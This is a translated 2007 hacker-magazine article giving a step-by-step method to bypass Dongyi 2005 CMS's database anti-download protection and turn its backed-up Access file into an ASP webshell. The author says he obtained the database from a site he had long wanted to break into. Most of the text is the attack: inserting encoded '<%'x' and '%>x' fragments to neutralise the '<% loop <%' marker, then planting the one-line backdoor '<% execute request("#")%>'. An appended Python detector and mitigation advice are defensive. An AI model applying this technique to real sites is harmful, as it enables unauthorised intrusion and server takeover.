Author: Heian [S.H.C] (http://vip8.org). Source: EvilOctal Security Team, www.eviloctal.com
This article was published in Hacker Manual, 2007, issue 6. Copyright belongs to Hacker Manual.
Test environment: Dongyi 2005 FREE edition, downloaded from http://down.chinaz.com/s/14661.asp. Compared with earlier releases this version has patched almost all the known holes: the upload vulnerability, writing a one-liner into the top menu, and so on are all dead. This article does not ask whether other vulnerabilities remain; it only discusses how to get a shell through the database backup.
First, how Dongyi handles its database. Dongyi adds a table named PE_NotDown to the database and writes the hex data 3C25206C6F6F70203C25 into it.
Some people will not understand what this data is; it looks unreadable, but it is simply the hexadecimal form of the string "<% loop <%". It sits in the table as hex, but if the .mdb database is parsed as ASP it is treated as those characters. Anyone who knows a little ASP syntax can see that "<% loop <%" is not closed, and that the loop has no matching do or exit do. I tried many times and could not get it closed. So how can it be closed? Once explained it is really not that complicated. Take the following code:
<% loop <%
Save it as an .asp file and parse it: it fails because nothing closes it, the "%>" is missing, as in the figure below:
If we append a "%>" afterwards, an error still occurs. So how do we strip this piece of code of its function? Look at the next piece of code:
<%'<% loop <%:%>
This code runs in IIS without any error. By the same principle we have a chance of breaking the protection: we only need to insert "<%'" and ":%>" at two suitable places in the database (sometimes the colon can be left out) to filter out the anti-download loop. Anyone who has read this far should understand what is going on.

That is all theory; I tested it locally on a Dongyi 2005 database, and here are the results. (The test has no target and is for research only; I take no responsibility for the publication of this method.)

First, install Dongyi. This version has basically fixed some vulnerabilities; whether others remain is not discussed here, only breaking the database. The database I tested with was downloaded from a site: I had long wanted to get into that site and had only obtained its database, so that database was the object of both study and testing. After downloading it I first backed it up and tested on a copy, because changes to an Access database need care (more on this later).

First rename the Dongyi database with an .asa extension and open it in IIS. The result is the same as the earlier figure, the missing "%>" error; this is Dongyi's anti-download handling at work. Then open the database in UltraEdit, switch to hex edit mode, and search for "<%". We land at the following place:
The green highlight shows the "<% loop <%" statement, which confirms the argument above. Searching further we find that the only two "<%" in the whole file are the two before and after loop, that is, one unclosed statement. So how do we break it? As discussed above, in ASP syntax the single quote starts a comment. If we add a commenting statement in front of it and insert a closing statement somewhere after it, is that not a breakthrough? Open the database in table design view and first find a place where the pieces can fit together. The table structure before and after the PE_NotDown table is as follows:
So, can a table in front of PE_NotDown hold code that comments out the ASP code behind it? To test this I chose PE_NewKeys, opened it and inserted a line of code. I used lake2's ascii2unicode tool to convert the code "<%'x" into two Unicode characters (the original shows them as a box-drawing glyph followed by a CJK character). Why the trailing x? Other characters work too, as long as the conversion result contains no question mark. (The conversion is what makes the modification feasible through the admin backend as well, because no special characters are involved; once the converted database is renamed .asa and parsed, the original characters come back. If you want the details, see lake2's blog.) Then I inserted it, as shown in the figure:
After saving, I renamed the database .asa and opened it. The error was the same as in the first figure: missing closing tag "%>". Opening it again in UltraEdit and searching for "<%", the first hit is the same as in the second figure, at line 458 where the loop statement is. Searching down twice more, at line 19118 we find what we just inserted into the database, as shown below:
Let's analyse this. "<% loop <%" is data in PE_NotDown and the converted string is data in PE_NewKeys. In the table structure PE_NewKeys comes before PE_NotDown, yet when the file is parsed as .asa the "<% loop <%" is displayed first; the order in which the data of an Access database appears when parsed as .asa is therefore not the table order. How do we make our data appear in front of it? Since I did not know the specific ordering, I chose brute force: starting from the first table, insert the converted string into each field in turn and look in UltraEdit to see which one lands in front. Before every insertion I started again from a fresh copy of the original Dongyi database, because when you delete a record in Access it disappears from the table view but still exists in the database file (UltraEdit shows it); only after the database is compacted are the deleted records really gone. (Compacting here means Access's own compact feature, not WinRAR compression.) After each insertion I searched UltraEdit for "<%" to locate the data. Testing table after table, the turning point came at PE_Channel. Open the data table, locate PE_Channel, and in the ChannelName field append the converted string after "Academy news", as shown in the figure:
Save, open the database in UltraEdit in hex edit mode, and search for "<%". The first result is in the following figure:
Now the first occurrence of "<%" is no longer the one joined to the loop: we have inserted an ASP tag "<%" in front of the loop. We also need to insert a "%>" somewhere after the loop to close it, and again I found the second insertion point by brute force. Append the converted form of " %>x" (two more Unicode characters) after the last title, as in the following figure:
Save, open the file in UltraEdit, and search for "%>x": at line 7546 we find the data we just inserted, as shown below:
To summarise, data was inserted twice. The first insertion, at line 189, is parsed as the ASP statement "<%'x". The second insertion, at line 7546, is parsed as the ASP statement "%>x". Dongyi's original anti-download statement "<% loop <%" appears at line 458, right between the two insertions. Now rename the database *.asa and parse it in IIS; the result is in the figure below:
This time part of the data is parsed, so our break has had its effect. Next thought: if we add execute request("#") after the first inserted data, can we get a backdoor? So I converted the string "<% execute request("#")%>a<%'x" into Unicode characters and inserted it in place of the first insertion, as shown in the figure:
Then view the result in UltraEdit and search for the inserted data, as in the figure below:
The newly inserted data now appears at line 7405, a far cry from line 189 of the first insertion; the loop statement is no longer enclosed, and the database again fails to parse. So I had to go back a step and look for another place. After a long search I found nothing, so I went back to studying what IIS displays, and saw the following:
There are many "jpg|jpeg" entries here, which we can recognise as the place where the allowed upload types are stored. Could we put the one-line trojan here and have it parsed? I wasted no more time: I copied the original database again, inserted the relevant data after the first and last titles of ChannelName by the previous method, then converted the one-line trojan "<% execute request("#")%>a" into Unicode characters and inserted it at the following place, as shown below:
Open it in UltraEdit; at line 196 we find "execute", as shown below:
At line 189 we find "<%'x", at line 483 the loop, and at line 7403 our ASP closing statement. I have marked them in the order in which they appear; in short, the backdoor is in front and should be able to execute. Open the file in IIS and we get the following result (opening takes a while, depending on the size of the database):
Our one-line trojan executes, breaking the database's anti-download function, and the backdoor can be reached through the database backup.

Postscript: after finishing this article I tried inserting data into other Dongyi 2005 databases by the same method without getting the expected result. It seems this method requires specific analysis of each specific database: the insertion points differ between databases, and even for the same database the insertion points may change whenever the data changes. If you experiment, you have to follow the insertion and positioning method above. Remember that intrusion is not copy-and-paste; back up the site's data first, so you can restore it if things go wrong. One more thing to note: if the database is large, opening it in IIS may hang IIS, so a machine with better performance helps.
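Added example, not part of the original article: a small Python check a site operator can run over the raw bytes of a Dongyi 2005 .mdb to confirm that the PE_NotDown marker is still present and that no foreign ASP tags, comment-openers or execute/request fragments have been inserted around it, which is exactly the shape of the bypass described above. The sample bytes are constructed here to imitate the layout the article describes (UTF-16LE text fields around the marker) and are not a real Access file; the function and constant names are my own.

```python
import re
from typing import Dict, List

# The record Dongyi 2005 writes into PE_NotDown so the .mdb fails if parsed as ASP:
# an unclosed loop followed by a dangling "<%".
ANTI_DOWNLOAD_MARKER = b"<% loop <%"
# Fragments a tampered file would carry: the one-line backdoor shape from the article.
BACKDOOR_PATTERNS = [rb"execute\s*\(?\s*request", rb"eval\s*\(?\s*request"]


def scan_mdb_bytes(raw: bytes) -> Dict[str, object]:
    """Report whether the marker still protects the file and where foreign ASP tags sit."""
    marker_at = raw.find(ANTI_DOWNLOAD_MARKER)
    findings: List[str] = []
    if marker_at < 0:
        findings.append("anti-download marker missing")
    # The two "<%" inside the marker are expected; any other "<%" or any "%>" is foreign.
    expected = {marker_at, marker_at + len(ANTI_DOWNLOAD_MARKER) - 2} if marker_at >= 0 else set()
    foreign_open = [m.start() for m in re.finditer(rb"<%", raw) if m.start() not in expected]
    close_tags = [m.start() for m in re.finditer(rb"%>", raw)]
    # Bypass shape from the article: a comment-opener "<%'" before the marker
    # (so the loop is commented out) and a "%>" after it (so the block is closed).
    comment_before = any(p < marker_at and raw.startswith(b"<%'", p) for p in foreign_open)
    close_after = any(p > marker_at for p in close_tags)
    bypassed = marker_at >= 0 and comment_before and close_after
    if bypassed:
        findings.append("marker neutralised: comment-opener before it and close tag after it")
    for pat in BACKDOOR_PATTERNS:
        if re.search(pat, raw, re.IGNORECASE):
            findings.append("backdoor-style fragment: " + pat.decode())
    return {"marker_offset": marker_at, "foreign_open_tags": foreign_open,
            "close_tags": close_tags, "bypassed": bypassed, "findings": findings}


def sample_mdb(tampered: bool) -> bytes:
    """Constructed stand-in for raw .mdb bytes (not a real Access file): UTF-16LE field
    text around the marker, plus the article's smuggled ASCII fragments when tampered."""
    def field(text: str) -> bytes:          # Access stores text fields as UTF-16LE
        return text.encode("utf-16-le")
    pre = field("Academy news") + (b"<%'x" if tampered else b"")
    shell = b'<% execute request("#")%>a' if tampered else b""
    post = field("jpg|jpeg|gif") + (b" %>x" if tampered else b"")
    return pre + b"\x00" * 8 + ANTI_DOWNLOAD_MARKER + b"\x00" * 8 + shell + post


if __name__ == "__main__":
    for label, blob in (("clean", sample_mdb(False)), ("tampered", sample_mdb(True))):
        print(label, scan_mdb_bytes(blob)["findings"])
```

The marker is only a speed bump: the dependable mitigation is to keep the database outside any web-served, script-mapped path and to restrict where the backend's backup feature may write, so that a tampered file can never be parsed by IIS at all.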
Sorry, I can only upload 10 attachments a day, so some of the pictures are only on my blog. Please forgive me!